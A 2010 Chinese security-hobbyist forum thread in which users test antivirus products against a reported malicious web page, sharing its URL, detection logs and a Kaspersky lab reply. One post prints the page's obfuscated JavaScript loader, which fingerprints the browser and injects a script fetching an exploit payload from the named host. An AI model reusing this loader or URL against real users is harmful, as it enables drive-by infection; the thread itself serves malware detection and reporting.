觉得自己杀软强的进来，又有新变种网马

kaba2

    经检测，11：58分还有效的新变种网马：

http://popopo2.com/tre/sena.asp

juechao2000

哦 AVG

polluxkyo

EAV
2010-6-7-星期一 13:57:33        HTTP 过滤器        文件        http://popopo2.com/tre/sena.asp        JS/Exploit.Agent.NBA 特洛伊木马        连接中断 - 已隔离        X-SKY\Quin        通过应用程序访问 web 时检测到威胁: F:\TheWorld\TheWorld.exe.

尝微听几

微点主防就不去了

basketmn

1. var MMgX3_s5_ok;function GV_w80v4_04E(crypt_key, dec_func){var xVi77__3_g = 0;try {if (mdvv) {xVi77__3_g = 1;}} catch(e) { }if (xVi77__3_g == 0) { return 0; }mdvv = mdvv.replace(/[g-z]/gi, "");MMgX3_s5_ok = clearInterval(MMgX3_s5_ok);var ct_pbB = document.getElementById("zd");ct_pbB.value = mdvv;eval(dec_func + "(crypt_key)");return 1;}var y0_Cw__08bf8 = -1;var JGjfl6iG_u6b_g = "01";var a__W_306_704 = navigator.appMinorVersion;while((y0_Cw__08bf8 = a__W_306_704.indexOf(";SP", y0_Cw__08bf8 + 1)) != -1) {var F0t27rrNd0K = a__W_306_704.charAt(y0_Cw__08bf8 + 3);if (F0t27rrNd0K == "1")JGjfl6iG_u6b_g = "02";else if (F0t27rrNd0K == "2")JGjfl6iG_u6b_g = "03";else if (F0t27rrNd0K == "3")JGjfl6iG_u6b_g = "04";else if (F0t27rrNd0K == "4")JGjfl6iG_u6b_g = "05";else if (F0t27rrNd0K == "5")JGjfl6iG_u6b_g = "06";else if (F0t27rrNd0K == "6")JGjfl6iG_u6b_g = "07";if (JGjfl6iG_u6b_g != "01")break;}if (JGjfl6iG_u6b_g == "01" && a__W_306_704.indexOf("Release Candidate", 0) != -1)JGjfl6iG_u6b_g = "08";var HF2_f___wE = "2" + JGjfl6iG_u6b_g;var h70r4g_2iV;if (!(h70r4g_2iV = navigator.systemLanguage)) {if (!(h70r4g_2iV = navigator.userLanguage)) {if (!(h70r4g_2iV = navigator.browserLanguage)) {h70r4g_2iV = navigator.language;}}}if (h70r4g_2iV) {h70r4g_2iV = h70r4g_2iV.substr(0, 10);var y4_R6_2Sp = "";for(var O__g_B18_AKL = 0; O__g_B18_AKL < h70r4g_2iV.length; O__g_B18_AKL++) {var O_87GX_3___0 = h70r4g_2iV.charCodeAt(O__g_B18_AKL).toString(16);if (O_87GX_3___0 < 2)y4_R6_2Sp += "0";y4_R6_2Sp += O_87GX_3___0;}while(y4_R6_2Sp.length < 20) {y4_R6_2Sp += "00";}HF2_f___wE += "L" + y4_R6_2Sp;}var RD__a_35_c_j = "nerot";var t_03uStR07U6_44 = firot;HF2_f___wE += "K";for(AYW8baogs_ioq = 0; AYW8baogs_ioq < t_03uStR07U6_44.length; AYW8baogs_ioq++) {if (t_03uStR07U6_44[AYW8baogs_ioq] >= 256) {t_03uStR07U6_44[AYW8baogs_ioq] -= 256;}var pfdE81a8J0oA8iP = t_03uStR07U6_44[AYW8baogs_ioq].toString(16);if (pfdE81a8J0oA8iP.length < 2) {pfdE81a8J0oA8iP = "0" + pfdE81a8J0oA8iP;}HF2_f___wE += pfdE81a8J0oA8iP;}var KU6iDee_S75 = document.createElement("script");KU6iDee_S75.setAttribute("type", "text/javascript");KU6iDee_S75.setAttribute("src", "http://popopo2.com/tre/sena.asp/wH417cfe8bV0100f060006R8efb0cc5102T0d7073dd" + HF2_f___wE);document.body.appendChild(KU6iDee_S75);var tmp = t_03uStR07U6_44[0];t_03uStR07U6_44[0] = t_03uStR07U6_44[3];t_03uStR07U6_44[3] = tmp;tmp = t_03uStR07U6_44[1];t_03uStR07U6_44[1] = t_03uStR07U6_44[2];t_03uStR07U6_44[2] = tmp;MMgX3_s5_ok = setInterval(function() { GV_w80v4_04E(t_03uStR07U6_44, RD__a_35_c_j); }, 100);

复制代码

safetyhr

详见图

arlthea

这个厉害，，，。。网盾跟金山卫士都没反应
貌似调用了JAVA 还有pdf reader

safetyhr

198.153.192.1
198.153.194.1
感觉还是不错的，呵呵

幸福的猪猪

卡巴斯基没有报警，网页源代码打包上报卡巴斯基。

您好，

114650078898.htm_ - Trojan.JS.Agent.bmo

以上文件包含恶意代码，下次更新后即可查杀。感谢您的上报。

回复时请引用全部邮件。


--

卡巴斯基中国病毒实验室


kaspersky 昨天 17:19

956608598

小A的网页防护还是很可靠的